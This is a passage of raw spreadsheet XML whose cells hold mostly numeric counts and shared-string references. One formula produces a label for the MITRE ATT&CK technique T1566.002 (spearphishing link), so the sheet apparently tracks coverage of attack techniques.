        <v>0</v>
      </c>
      <c r="CQ88" s="108">
        <v>0</v>
      </c>
      <c r="CR88" s="109">
        <v>2</v>
      </c>
      <c r="CS88" s="110" t="s">
        <v>1958</v>
      </c>
      <c r="CT88" s="501">
        <v>1</v>
      </c>
      <c r="CU88" s="111" t="s">
        <v>1959</v>
      </c>
      <c r="CV88" s="111">
        <v>1</v>
      </c>
      <c r="CW88" s="112">
        <v>1</v>
      </c>
      <c r="CX88" s="113">
        <v>1196</v>
      </c>
      <c r="CY88" s="114" t="s">
        <v>2185</v>
      </c>
      <c r="CZ88" s="503">
        <v>5</v>
      </c>
      <c r="DA88" s="115" t="s">
        <v>2186</v>
      </c>
      <c r="DB88" s="115">
        <v>3</v>
      </c>
      <c r="DC88" s="116">
        <v>2</v>
      </c>
      <c r="DD88" s="101">
        <v>0</v>
      </c>
      <c r="DE88" s="102">
        <v>0</v>
      </c>
      <c r="DF88" s="102">
        <v>0</v>
      </c>
      <c r="DG88" s="103">
        <v>0</v>
      </c>
      <c r="DH88" s="103">
        <v>0</v>
      </c>
      <c r="DI88" s="104">
        <v>0</v>
      </c>
      <c r="DJ88" s="105">
        <v>0</v>
      </c>
      <c r="DK88" s="106">
        <v>0</v>
      </c>
      <c r="DL88" s="497">
        <v>0</v>
      </c>
      <c r="DM88" s="107">
        <v>0</v>
      </c>
      <c r="DN88" s="107">
        <v>0</v>
      </c>
      <c r="DO88" s="108">
        <v>0</v>
      </c>
      <c r="DP88" s="109">
        <v>0</v>
      </c>
      <c r="DQ88" s="110">
        <v>0</v>
      </c>
      <c r="DR88" s="501">
        <v>0</v>
      </c>
      <c r="DS88" s="111">
        <v>0</v>
      </c>
      <c r="DT88" s="111">
        <v>0</v>
      </c>
      <c r="DU88" s="112">
        <v>0</v>
      </c>
      <c r="DV88" s="113">
        <v>1</v>
      </c>
      <c r="DW88" s="114" t="s">
        <v>3708</v>
      </c>
      <c r="DX88" s="503">
        <v>1</v>
      </c>
      <c r="DY88" s="115" t="s">
        <v>3709</v>
      </c>
      <c r="DZ88" s="115">
        <v>1</v>
      </c>
      <c r="EA88" s="116">
        <v>1</v>
      </c>
      <c r="EB88" s="250">
        <v>0</v>
      </c>
      <c r="EC88" s="251">
        <v>0</v>
      </c>
      <c r="ED88" s="505">
        <v>0</v>
      </c>
      <c r="EE88" s="252">
        <v>0</v>
      </c>
      <c r="EF88" s="252">
        <v>0</v>
      </c>
      <c r="EG88" s="253">
        <v>0</v>
      </c>
      <c r="EH88" s="101">
        <v>1</v>
      </c>
      <c r="EI88" s="102" t="s">
        <v>3708</v>
      </c>
      <c r="EJ88" s="102">
        <v>1</v>
      </c>
      <c r="EK88" s="103" t="s">
        <v>3709</v>
      </c>
      <c r="EL88" s="103">
        <v>1</v>
      </c>
      <c r="EM88" s="104">
        <v>1</v>
      </c>
      <c r="EN88" s="105">
        <v>0</v>
      </c>
      <c r="EO88" s="106">
        <v>0</v>
      </c>
      <c r="EP88" s="497">
        <v>0</v>
      </c>
      <c r="EQ88" s="107">
        <v>0</v>
      </c>
      <c r="ER88" s="107">
        <v>0</v>
      </c>
      <c r="ES88" s="108">
        <v>0</v>
      </c>
      <c r="ET88" s="109">
        <v>0</v>
      </c>
      <c r="EU88" s="110">
        <v>0</v>
      </c>
      <c r="EV88" s="501">
        <v>0</v>
      </c>
      <c r="EW88" s="111">
        <v>0</v>
      </c>
      <c r="EX88" s="111">
        <v>0</v>
      </c>
      <c r="EY88" s="112">
        <v>0</v>
      </c>
      <c r="EZ88" s="113">
        <v>0</v>
      </c>
      <c r="FA88" s="114">
        <v>0</v>
      </c>
      <c r="FB88" s="503">
        <v>0</v>
      </c>
      <c r="FC88" s="115">
        <v>0</v>
      </c>
      <c r="FD88" s="115">
        <v>0</v>
      </c>
      <c r="FE88" s="116">
        <v>0</v>
      </c>
      <c r="FF88" s="101">
        <v>1194</v>
      </c>
      <c r="FG88" s="102" t="s">
        <v>2047</v>
      </c>
      <c r="FH88" s="102">
        <v>4</v>
      </c>
      <c r="FI88" s="103" t="s">
        <v>2036</v>
      </c>
      <c r="FJ88" s="103">
        <v>2</v>
      </c>
      <c r="FK88" s="104">
        <v>2</v>
      </c>
      <c r="FL88" s="105">
        <v>0</v>
      </c>
      <c r="FM88" s="106">
        <v>0</v>
      </c>
      <c r="FN88" s="497">
        <v>0</v>
      </c>
      <c r="FO88" s="107">
        <v>0</v>
      </c>
      <c r="FP88" s="107">
        <v>0</v>
      </c>
      <c r="FQ88" s="108">
        <v>0</v>
      </c>
      <c r="FR88" s="109">
        <v>1194</v>
      </c>
      <c r="FS88" s="110" t="s">
        <v>2047</v>
      </c>
      <c r="FT88" s="501">
        <v>4</v>
      </c>
      <c r="FU88" s="111" t="s">
        <v>2036</v>
      </c>
      <c r="FV88" s="111">
        <v>2</v>
      </c>
      <c r="FW88" s="112">
        <v>2</v>
      </c>
      <c r="FX88" s="113">
        <v>1196</v>
      </c>
      <c r="FY88" s="114" t="s">
        <v>2185</v>
      </c>
      <c r="FZ88" s="503">
        <v>5</v>
      </c>
      <c r="GA88" s="115" t="s">
        <v>2186</v>
      </c>
      <c r="GB88" s="115">
        <v>3</v>
      </c>
      <c r="GC88" s="116">
        <v>2</v>
      </c>
      <c r="GD88" s="250">
        <v>20</v>
      </c>
      <c r="GE88" s="251" t="s">
        <v>3706</v>
      </c>
      <c r="GF88" s="505">
        <v>3</v>
      </c>
      <c r="GG88" s="252" t="s">
        <v>3707</v>
      </c>
      <c r="GH88" s="252">
        <v>2</v>
      </c>
      <c r="GI88" s="253">
        <v>2</v>
      </c>
      <c r="GJ88" s="101">
        <v>1216</v>
      </c>
      <c r="GK88" s="102" t="s">
        <v>3710</v>
      </c>
      <c r="GL88" s="102">
        <v>8</v>
      </c>
      <c r="GM88" s="103" t="s">
        <v>3711</v>
      </c>
      <c r="GN88" s="103">
        <v>5</v>
      </c>
      <c r="GO88" s="104">
        <v>2</v>
      </c>
      <c r="GP88" s="105">
        <v>0</v>
      </c>
      <c r="GQ88" s="106">
        <v>0</v>
      </c>
      <c r="GR88" s="497">
        <v>0</v>
      </c>
      <c r="GS88" s="107">
        <v>0</v>
      </c>
      <c r="GT88" s="107">
        <v>0</v>
      </c>
      <c r="GU88" s="108">
        <v>0</v>
      </c>
      <c r="GV88" s="109">
        <v>2</v>
      </c>
      <c r="GW88" s="110" t="s">
        <v>1958</v>
      </c>
      <c r="GX88" s="501">
        <v>1</v>
      </c>
      <c r="GY88" s="111" t="s">
        <v>1959</v>
      </c>
      <c r="GZ88" s="111">
        <v>1</v>
      </c>
      <c r="HA88" s="112">
        <v>1</v>
      </c>
      <c r="HB88" s="113">
        <v>1196</v>
      </c>
      <c r="HC88" s="114" t="s">
        <v>2185</v>
      </c>
      <c r="HD88" s="503">
        <v>5</v>
      </c>
      <c r="HE88" s="115" t="s">
        <v>2186</v>
      </c>
      <c r="HF88" s="115">
        <v>3</v>
      </c>
      <c r="HG88" s="116">
        <v>2</v>
      </c>
      <c r="HH88" s="101">
        <v>0</v>
      </c>
      <c r="HI88" s="102">
        <v>0</v>
      </c>
      <c r="HJ88" s="102">
        <v>0</v>
      </c>
      <c r="HK88" s="103">
        <v>0</v>
      </c>
      <c r="HL88" s="103">
        <v>0</v>
      </c>
      <c r="HM88" s="104">
        <v>0</v>
      </c>
      <c r="HN88" s="105">
        <v>0</v>
      </c>
      <c r="HO88" s="106">
        <v>0</v>
      </c>
      <c r="HP88" s="497">
        <v>0</v>
      </c>
      <c r="HQ88" s="107">
        <v>0</v>
      </c>
      <c r="HR88" s="107">
        <v>0</v>
      </c>
      <c r="HS88" s="108">
        <v>0</v>
      </c>
      <c r="HT88" s="109">
        <v>0</v>
      </c>
      <c r="HU88" s="110">
        <v>0</v>
      </c>
      <c r="HV88" s="501">
        <v>0</v>
      </c>
      <c r="HW88" s="111">
        <v>0</v>
      </c>
      <c r="HX88" s="111">
        <v>0</v>
      </c>
      <c r="HY88" s="112">
        <v>0</v>
      </c>
      <c r="HZ88" s="113">
        <v>0</v>
      </c>
      <c r="IA88" s="114">
        <v>0</v>
      </c>
      <c r="IB88" s="503">
        <v>0</v>
      </c>
      <c r="IC88" s="115">
        <v>0</v>
      </c>
      <c r="ID88" s="115">
        <v>0</v>
      </c>
      <c r="IE88" s="116">
        <v>0</v>
      </c>
      <c r="IF88" s="250">
        <v>0</v>
      </c>
      <c r="IG88" s="251">
        <v>0</v>
      </c>
      <c r="IH88" s="505">
        <v>0</v>
      </c>
      <c r="II88" s="252">
        <v>0</v>
      </c>
      <c r="IJ88" s="252">
        <v>0</v>
      </c>
      <c r="IK88" s="253">
        <v>0</v>
      </c>
      <c r="IL88" s="101">
        <v>0</v>
      </c>
      <c r="IM88" s="102">
        <v>0</v>
      </c>
      <c r="IN88" s="102">
        <v>0</v>
      </c>
      <c r="IO88" s="103">
        <v>0</v>
      </c>
      <c r="IP88" s="103">
        <v>0</v>
      </c>
      <c r="IQ88" s="104">
        <v>0</v>
      </c>
      <c r="IR88" s="105">
        <v>0</v>
      </c>
      <c r="IS88" s="106">
        <v>0</v>
      </c>
      <c r="IT88" s="497">
        <v>0</v>
      </c>
      <c r="IU88" s="107">
        <v>0</v>
      </c>
      <c r="IV88" s="107">
        <v>0</v>
      </c>
      <c r="IW88" s="108">
        <v>0</v>
      </c>
      <c r="IX88" s="109">
        <v>0</v>
      </c>
      <c r="IY88" s="110">
        <v>0</v>
      </c>
      <c r="IZ88" s="501">
        <v>0</v>
      </c>
      <c r="JA88" s="111">
        <v>0</v>
      </c>
      <c r="JB88" s="111">
        <v>0</v>
      </c>
      <c r="JC88" s="112">
        <v>0</v>
      </c>
      <c r="JD88" s="113">
        <v>0</v>
      </c>
      <c r="JE88" s="114">
        <v>0</v>
      </c>
      <c r="JF88" s="503">
        <v>0</v>
      </c>
      <c r="JG88" s="115">
        <v>0</v>
      </c>
      <c r="JH88" s="115">
        <v>0</v>
      </c>
      <c r="JI88" s="116">
        <v>0</v>
      </c>
      <c r="JJ88" s="101">
        <v>0</v>
      </c>
      <c r="JK88" s="102">
        <v>0</v>
      </c>
      <c r="JL88" s="102">
        <v>0</v>
      </c>
      <c r="JM88" s="103">
        <v>0</v>
      </c>
      <c r="JN88" s="103">
        <v>0</v>
      </c>
      <c r="JO88" s="104">
        <v>0</v>
      </c>
      <c r="JP88" s="105">
        <v>0</v>
      </c>
      <c r="JQ88" s="106">
        <v>0</v>
      </c>
      <c r="JR88" s="497">
        <v>0</v>
      </c>
      <c r="JS88" s="107">
        <v>0</v>
      </c>
      <c r="JT88" s="107">
        <v>0</v>
      </c>
      <c r="JU88" s="108">
        <v>0</v>
      </c>
      <c r="JV88" s="109">
        <v>0</v>
      </c>
      <c r="JW88" s="110">
        <v>0</v>
      </c>
      <c r="JX88" s="501">
        <v>0</v>
      </c>
      <c r="JY88" s="111">
        <v>0</v>
      </c>
      <c r="JZ88" s="111">
        <v>0</v>
      </c>
      <c r="KA88" s="112">
        <v>0</v>
      </c>
      <c r="KB88" s="113">
        <v>0</v>
      </c>
      <c r="KC88" s="114">
        <v>0</v>
      </c>
      <c r="KD88" s="503">
        <v>0</v>
      </c>
      <c r="KE88" s="115">
        <v>0</v>
      </c>
      <c r="KF88" s="115">
        <v>0</v>
      </c>
      <c r="KG88" s="116">
        <v>0</v>
      </c>
      <c r="KH88" s="250">
        <v>0</v>
      </c>
      <c r="KI88" s="251">
        <v>0</v>
      </c>
      <c r="KJ88" s="505">
        <v>0</v>
      </c>
      <c r="KK88" s="252">
        <v>0</v>
      </c>
      <c r="KL88" s="252">
        <v>0</v>
      </c>
      <c r="KM88" s="253">
        <v>0</v>
      </c>
      <c r="KN88" s="101">
        <v>0</v>
      </c>
      <c r="KO88" s="102">
        <v>0</v>
      </c>
      <c r="KP88" s="102">
        <v>0</v>
      </c>
      <c r="KQ88" s="103">
        <v>0</v>
      </c>
      <c r="KR88" s="103">
        <v>0</v>
      </c>
      <c r="KS88" s="104">
        <v>0</v>
      </c>
      <c r="KT88" s="105">
        <v>0</v>
      </c>
      <c r="KU88" s="106">
        <v>0</v>
      </c>
      <c r="KV88" s="497">
        <v>0</v>
      </c>
      <c r="KW88" s="107">
        <v>0</v>
      </c>
      <c r="KX88" s="107">
        <v>0</v>
      </c>
      <c r="KY88" s="108">
        <v>0</v>
      </c>
      <c r="KZ88" s="109">
        <v>0</v>
      </c>
      <c r="LA88" s="110">
        <v>0</v>
      </c>
      <c r="LB88" s="501">
        <v>0</v>
      </c>
      <c r="LC88" s="111">
        <v>0</v>
      </c>
      <c r="LD88" s="111">
        <v>0</v>
      </c>
      <c r="LE88" s="112">
        <v>0</v>
      </c>
      <c r="LF88" s="113">
        <v>0</v>
      </c>
      <c r="LG88" s="114">
        <v>0</v>
      </c>
      <c r="LH88" s="503">
        <v>0</v>
      </c>
      <c r="LI88" s="115">
        <v>0</v>
      </c>
      <c r="LJ88" s="115">
        <v>0</v>
      </c>
      <c r="LK88" s="116">
        <v>0</v>
      </c>
      <c r="LL88" s="117">
        <v>3</v>
      </c>
      <c r="LM88" s="507">
        <v>2</v>
      </c>
      <c r="LN88" s="119">
        <v>2</v>
      </c>
      <c r="LO88" s="119">
        <v>0</v>
      </c>
      <c r="LP88" s="119">
        <v>1</v>
      </c>
      <c r="LQ88" s="119">
        <v>1</v>
      </c>
      <c r="LR88" s="119">
        <v>0</v>
      </c>
      <c r="LS88" s="119">
        <v>1</v>
      </c>
      <c r="LT88" s="382"/>
      <c r="LU88" s="117">
        <v>0</v>
      </c>
      <c r="LV88" s="118">
        <v>0</v>
      </c>
      <c r="LW88" s="507">
        <v>0</v>
      </c>
      <c r="LX88" s="119">
        <v>0</v>
      </c>
      <c r="LY88" s="119">
        <v>0</v>
      </c>
      <c r="LZ88" s="119">
        <v>0</v>
      </c>
      <c r="MA88" s="117">
        <v>0</v>
      </c>
      <c r="MB88" s="118">
        <v>0</v>
      </c>
      <c r="MC88" s="507">
        <v>0</v>
      </c>
      <c r="MD88" s="119">
        <v>0</v>
      </c>
      <c r="ME88" s="119">
        <v>0</v>
      </c>
      <c r="MF88" s="119">
        <v>0</v>
      </c>
      <c r="MG88" s="117">
        <v>0</v>
      </c>
      <c r="MH88" s="118">
        <v>0</v>
      </c>
      <c r="MI88" s="507">
        <v>0</v>
      </c>
      <c r="MJ88" s="119">
        <v>0</v>
      </c>
      <c r="MK88" s="119">
        <v>0</v>
      </c>
      <c r="ML88" s="119">
        <v>0</v>
      </c>
      <c r="MM88" s="117">
        <v>2</v>
      </c>
      <c r="MN88" s="118" t="s">
        <v>4269</v>
      </c>
      <c r="MO88" s="507">
        <v>1</v>
      </c>
      <c r="MP88" s="119" t="s">
        <v>3712</v>
      </c>
      <c r="MQ88" s="119">
        <v>1</v>
      </c>
      <c r="MR88" s="119">
        <v>1</v>
      </c>
      <c r="MS88" s="117">
        <v>1</v>
      </c>
      <c r="MT88" s="118" t="s">
        <v>4196</v>
      </c>
      <c r="MU88" s="507">
        <v>1</v>
      </c>
      <c r="MV88" s="119" t="s">
        <v>2658</v>
      </c>
      <c r="MW88" s="119">
        <v>1</v>
      </c>
      <c r="MX88" s="119">
        <v>1</v>
      </c>
      <c r="MY88" s="117">
        <v>0</v>
      </c>
      <c r="MZ88" s="118">
        <v>0</v>
      </c>
      <c r="NA88" s="507">
        <v>0</v>
      </c>
      <c r="NB88" s="119">
        <v>0</v>
      </c>
      <c r="NC88" s="119">
        <v>0</v>
      </c>
      <c r="ND88" s="119">
        <v>0</v>
      </c>
      <c r="NE88" s="117">
        <v>0</v>
      </c>
      <c r="NF88" s="118">
        <v>0</v>
      </c>
      <c r="NG88" s="507">
        <v>0</v>
      </c>
      <c r="NH88" s="119">
        <v>0</v>
      </c>
      <c r="NI88" s="119">
        <v>0</v>
      </c>
      <c r="NJ88" s="119">
        <v>0</v>
      </c>
      <c r="NK88" s="117">
        <v>0</v>
      </c>
      <c r="NL88" s="118">
        <v>0</v>
      </c>
      <c r="NM88" s="507">
        <v>0</v>
      </c>
      <c r="NN88" s="119">
        <v>0</v>
      </c>
      <c r="NO88" s="119">
        <v>0</v>
      </c>
      <c r="NP88" s="119">
        <v>0</v>
      </c>
      <c r="NQ88" s="117">
        <v>0</v>
      </c>
      <c r="NR88" s="118">
        <v>0</v>
      </c>
      <c r="NS88" s="507">
        <v>0</v>
      </c>
      <c r="NT88" s="119">
        <v>0</v>
      </c>
      <c r="NU88" s="119">
        <v>0</v>
      </c>
      <c r="NV88" s="119">
        <v>0</v>
      </c>
      <c r="NW88" s="117">
        <v>0</v>
      </c>
      <c r="NX88" s="118">
        <v>0</v>
      </c>
      <c r="NY88" s="507">
        <v>0</v>
      </c>
      <c r="NZ88" s="119">
        <v>0</v>
      </c>
      <c r="OA88" s="119">
        <v>0</v>
      </c>
      <c r="OB88" s="119">
        <v>0</v>
      </c>
      <c r="OC88" s="120">
        <v>2</v>
      </c>
      <c r="OD88" s="120">
        <v>2</v>
      </c>
      <c r="OE88" s="120">
        <v>2</v>
      </c>
      <c r="OF88" s="121">
        <v>1</v>
      </c>
      <c r="OG88" s="120">
        <v>1</v>
      </c>
      <c r="OH88" s="120">
        <v>1</v>
      </c>
      <c r="OI88" s="120">
        <v>1</v>
      </c>
      <c r="OJ88" s="120">
        <v>1</v>
      </c>
      <c r="OK88" s="383"/>
      <c r="OL88" s="120">
        <v>0</v>
      </c>
      <c r="OM88" s="120">
        <v>0</v>
      </c>
      <c r="ON88" s="120">
        <v>0</v>
      </c>
      <c r="OO88" s="193"/>
      <c r="OP88" s="193">
        <v>0</v>
      </c>
      <c r="OQ88" s="464">
        <v>0</v>
      </c>
      <c r="OR88" s="120">
        <v>0</v>
      </c>
      <c r="OS88" s="120">
        <v>0</v>
      </c>
      <c r="OT88" s="120">
        <v>0</v>
      </c>
      <c r="OU88" s="193"/>
      <c r="OV88" s="193">
        <v>0</v>
      </c>
      <c r="OW88" s="464">
        <v>0</v>
      </c>
      <c r="OX88" s="120">
        <v>1</v>
      </c>
      <c r="OY88" s="120">
        <v>1</v>
      </c>
      <c r="OZ88" s="120">
        <v>1</v>
      </c>
      <c r="PA88" s="193" t="s">
        <v>3713</v>
      </c>
      <c r="PB88" s="193">
        <v>1</v>
      </c>
      <c r="PC88" s="464">
        <v>1</v>
      </c>
      <c r="PD88" s="120">
        <v>0</v>
      </c>
      <c r="PE88" s="120">
        <v>0</v>
      </c>
      <c r="PF88" s="120">
        <v>0</v>
      </c>
      <c r="PG88" s="193"/>
      <c r="PH88" s="193">
        <v>0</v>
      </c>
      <c r="PI88" s="464">
        <v>0</v>
      </c>
      <c r="PJ88" s="120">
        <v>1</v>
      </c>
      <c r="PK88" s="120">
        <v>1</v>
      </c>
      <c r="PL88" s="120">
        <v>1</v>
      </c>
      <c r="PM88" s="193" t="s">
        <v>3714</v>
      </c>
      <c r="PN88" s="193">
        <v>1</v>
      </c>
      <c r="PO88" s="464">
        <v>1</v>
      </c>
      <c r="PP88" s="120">
        <v>2</v>
      </c>
      <c r="PQ88" s="120">
        <v>2</v>
      </c>
      <c r="PR88" s="120">
        <v>1</v>
      </c>
      <c r="PS88" s="193" t="s">
        <v>2660</v>
      </c>
      <c r="PT88" s="193">
        <v>1</v>
      </c>
      <c r="PU88" s="464">
        <v>1</v>
      </c>
      <c r="PV88" s="120">
        <v>0</v>
      </c>
      <c r="PW88" s="120">
        <v>0</v>
      </c>
      <c r="PX88" s="120">
        <v>0</v>
      </c>
      <c r="PY88" s="193"/>
      <c r="PZ88" s="193">
        <v>0</v>
      </c>
      <c r="QA88" s="464">
        <v>0</v>
      </c>
      <c r="QB88" s="120">
        <v>0</v>
      </c>
      <c r="QC88" s="120">
        <v>0</v>
      </c>
      <c r="QD88" s="120">
        <v>0</v>
      </c>
      <c r="QE88" s="193"/>
      <c r="QF88" s="193">
        <v>0</v>
      </c>
      <c r="QG88" s="464">
        <v>0</v>
      </c>
      <c r="QH88" s="120">
        <v>0</v>
      </c>
      <c r="QI88" s="120">
        <v>0</v>
      </c>
      <c r="QJ88" s="120">
        <v>0</v>
      </c>
      <c r="QK88" s="193"/>
      <c r="QL88" s="193">
        <v>0</v>
      </c>
      <c r="QM88" s="464">
        <v>0</v>
      </c>
      <c r="QN88" s="120">
        <v>0</v>
      </c>
      <c r="QO88" s="120">
        <v>0</v>
      </c>
      <c r="QP88" s="120">
        <v>0</v>
      </c>
      <c r="QQ88" s="193"/>
      <c r="QR88" s="193">
        <v>0</v>
      </c>
      <c r="QS88" s="464">
        <v>0</v>
      </c>
      <c r="QT88" s="184"/>
      <c r="QU88" s="184"/>
      <c r="QV88" s="184"/>
      <c r="QW88" s="184"/>
      <c r="QX88" s="184"/>
      <c r="QY88" s="184"/>
      <c r="QZ88" s="184"/>
      <c r="RA88" s="184"/>
      <c r="RB88" s="184"/>
      <c r="RC88" s="184"/>
      <c r="RD88" s="184"/>
      <c r="RE88" s="184"/>
      <c r="RF88" s="184"/>
      <c r="RG88" s="184"/>
      <c r="RH88" s="184"/>
      <c r="RI88" s="184"/>
      <c r="RJ88" s="184"/>
      <c r="RK88" s="184"/>
      <c r="RL88" s="184"/>
      <c r="RM88" s="184"/>
      <c r="RN88" s="184"/>
      <c r="RO88" s="184"/>
      <c r="RP88" s="184"/>
      <c r="RQ88" s="184"/>
      <c r="RR88" s="184"/>
      <c r="RS88" s="184"/>
      <c r="RT88" s="184"/>
      <c r="RU88" s="184"/>
      <c r="RV88" s="184"/>
      <c r="RW88" s="184"/>
      <c r="RX88" s="184"/>
      <c r="RY88" s="184"/>
      <c r="RZ88" s="184"/>
      <c r="SA88" s="184"/>
      <c r="SB88" s="184"/>
      <c r="SC88" s="184"/>
      <c r="SD88" s="184"/>
      <c r="SE88" s="184"/>
      <c r="SF88" s="184"/>
      <c r="SG88" s="184"/>
      <c r="SH88" s="184"/>
      <c r="SI88" s="184"/>
      <c r="SJ88" s="184"/>
      <c r="SK88" s="184"/>
      <c r="SL88" s="184"/>
      <c r="SM88" s="184"/>
      <c r="SN88" s="184"/>
      <c r="SO88" s="184"/>
      <c r="SP88" s="184"/>
      <c r="SQ88" s="184"/>
      <c r="SR88" s="184"/>
      <c r="SS88" s="184"/>
      <c r="ST88" s="184"/>
      <c r="SU88" s="184"/>
      <c r="SV88" s="184"/>
      <c r="SW88" s="184"/>
      <c r="SX88" s="184"/>
      <c r="SY88" s="184"/>
      <c r="SZ88" s="184"/>
      <c r="TA88" s="184"/>
      <c r="TB88" s="184"/>
      <c r="TC88" s="184"/>
      <c r="TD88" s="184"/>
      <c r="TE88" s="184"/>
      <c r="TF88" s="184"/>
      <c r="TG88" s="184"/>
      <c r="TH88" s="184"/>
      <c r="TI88" s="184"/>
      <c r="TJ88" s="184"/>
      <c r="TK88" s="184"/>
      <c r="TL88" s="184"/>
      <c r="TM88" s="184"/>
      <c r="TN88" s="184"/>
      <c r="TO88" s="184"/>
      <c r="TP88" s="184"/>
      <c r="TQ88" s="184"/>
      <c r="TR88" s="184"/>
      <c r="TS88" s="184"/>
      <c r="TT88" s="184"/>
      <c r="TU88" s="184"/>
      <c r="TV88" s="184"/>
      <c r="TW88" s="184"/>
      <c r="TX88" s="184"/>
      <c r="TY88" s="184"/>
      <c r="TZ88" s="184"/>
      <c r="UA88" s="184"/>
      <c r="UB88" s="184"/>
      <c r="UC88" s="184"/>
      <c r="UD88" s="184"/>
      <c r="UE88" s="184"/>
      <c r="UF88" s="184"/>
      <c r="UG88" s="184"/>
      <c r="UH88" s="184"/>
      <c r="UI88" s="184"/>
      <c r="UJ88" s="184"/>
      <c r="UK88" s="184"/>
      <c r="UL88" s="184"/>
      <c r="UM88" s="184"/>
      <c r="UN88" s="184"/>
      <c r="UO88" s="184"/>
      <c r="UP88" s="184"/>
      <c r="UQ88" s="184"/>
      <c r="UR88" s="184"/>
      <c r="US88" s="184"/>
      <c r="UT88" s="184"/>
      <c r="UU88" s="184"/>
      <c r="UV88" s="184"/>
      <c r="UW88" s="184"/>
      <c r="UX88" s="184"/>
      <c r="UY88" s="184"/>
      <c r="UZ88" s="184"/>
      <c r="VA88" s="184"/>
      <c r="VB88" s="184"/>
      <c r="VC88" s="184"/>
      <c r="VD88" s="184"/>
      <c r="VE88" s="184"/>
      <c r="VF88" s="184"/>
      <c r="VG88" s="184"/>
      <c r="VH88" s="184"/>
      <c r="VI88" s="184"/>
      <c r="VJ88" s="184"/>
      <c r="VK88" s="184"/>
      <c r="VL88" s="184"/>
      <c r="VM88" s="184"/>
      <c r="VN88" s="184"/>
      <c r="VO88" s="184"/>
      <c r="VP88" s="184"/>
      <c r="VQ88" s="184"/>
      <c r="VR88" s="184"/>
      <c r="VS88" s="184"/>
      <c r="VT88" s="184"/>
      <c r="VU88" s="184"/>
      <c r="VV88" s="184"/>
      <c r="VW88" s="184"/>
      <c r="VX88" s="184"/>
      <c r="VY88" s="184"/>
    </row>
    <row r="89" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A89" s="82" t="s">
        <v>72</v>
      </c>
      <c r="B89" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C89" s="83" t="s">
        <v>437</v>
      </c>
      <c r="D89" s="83" t="s">
        <v>131</v>
      </c>
      <c r="E89" s="83">
        <f t="shared" si="5"/>
        <v>57</v>
      </c>
      <c r="F89" s="83" t="s">
        <v>132</v>
      </c>
      <c r="G89" s="83" t="s">
        <v>1510</v>
      </c>
      <c r="H89" s="83" t="s">
        <v>1511</v>
      </c>
      <c r="I89" s="81" t="s">
        <v>1512</v>
      </c>
      <c r="J89" s="85" t="s">
        <v>4</v>
      </c>
      <c r="K89" s="81" t="s">
        <v>1513</v>
      </c>
      <c r="L89" s="81" t="s">
        <v>1514</v>
      </c>
      <c r="M89" s="378" t="s">
        <v>248</v>
      </c>
      <c r="N89" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O89" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P89" s="91"/>
      <c r="Q89" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R89" s="92" t="s">
        <v>1515</v>
      </c>
      <c r="S89" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T89" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U89" s="94" t="s">
        <v>1516</v>
      </c>
      <c r="V89" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W89" s="96" t="s">
        <v>1442</v>
      </c>
      <c r="X89" s="97" t="s">
        <v>1517</v>
      </c>
      <c r="Y89" s="83" t="s">
        <v>1518</v>
      </c>
      <c r="Z89" s="188" t="s">
        <v>1509</v>
      </c>
      <c r="AA89" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB89" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC89" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD89" s="83"/>
      <c r="AE89" s="83"/>
      <c r="AF89" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG89" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH89" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI89" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ89" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK89" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL89" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM89" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN89" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO89" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP89" s="385" t="str">
        <f>M89&amp;"-frag"</f>
        <v>T1566.002-Spearphishing_Link-frag</v>
      </c>
      <c r="AQ89" s="646">
        <v>170</v>
      </c>
      <c r="AR89" s="100"/>
      <c r="AS89" s="100">
        <v>1</v>
      </c>
      <c r="AT89" s="100">
        <v>0</v>
      </c>
      <c r="AU89" s="100">
        <v>1</v>
      </c>
      <c r="AV89" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW89" s="100">
        <v>1</v>
      </c>
      <c r="AX89" s="100">
        <v>1</v>
      </c>
      <c r="AY89" s="100">
        <v>0</v>
      </c>
      <c r="AZ89" s="100">
        <v>1</v>
      </c>
      <c r="BA89" s="381" t="s">
        <v>4905</v>
      </c>
      <c r="BB89" s="101">
        <v>14</v>
      </c>
      <c r="BC89" s="102" t="s">
        <v>3715</v>
      </c>
      <c r="BD89" s="102">
        <v>8</v>
      </c>
      <c r="BE89" s="103" t="s">
        <v>1811</v>
      </c>
      <c r="BF89" s="103">
        <v>2</v>
      </c>
      <c r="BG89" s="104">
        <v>5</v>
      </c>
      <c r="BH89" s="105">
        <v>29</v>
      </c>
      <c r="BI89" s="106" t="s">
        <v>3716</v>
      </c>
      <c r="BJ89" s="497">
        <v>28</v>
      </c>
      <c r="BK89" s="107" t="s">
        <v>3717</v>
      </c>
      <c r="BL89" s="107">
        <v>6</v>
      </c>
      <c r="BM89" s="108">
        <v>13</v>
      </c>
      <c r="BN89" s="109">
        <v>43</v>
      </c>
      <c r="BO89" s="110" t="s">
        <v>2048</v>
      </c>
      <c r="BP89" s="501">
        <v>36</v>
      </c>
      <c r="BQ89" s="111" t="s">
        <v>2049</v>
      </c>
      <c r="BR89" s="111">
        <v>8</v>
      </c>
      <c r="BS89" s="112">
        <v>18</v>
      </c>
      <c r="BT89" s="113">
        <v>23</v>
      </c>
      <c r="BU89" s="114" t="s">
        <v>3718</v>
      </c>
      <c r="BV89" s="503">
        <v>16</v>
      </c>
      <c r="BW89" s="115" t="s">
        <v>3719</v>
      </c>
      <c r="BX89" s="115">
        <v>8</v>
      </c>
      <c r="BY89" s="116">
        <v>9</v>
      </c>
